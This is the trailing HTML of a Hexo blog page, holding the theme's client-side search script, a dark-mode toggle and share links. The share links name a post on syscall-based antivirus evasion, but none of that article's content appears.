      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + syscall%E5%85%8D%E6%9D%80%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95(%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0) + '&url=' + http%3A%2F%2Fexample.com%2F2024%2F04%2F10%2Fsyscall-AVBypass%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/2024/04/10/syscall-AVBypass/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
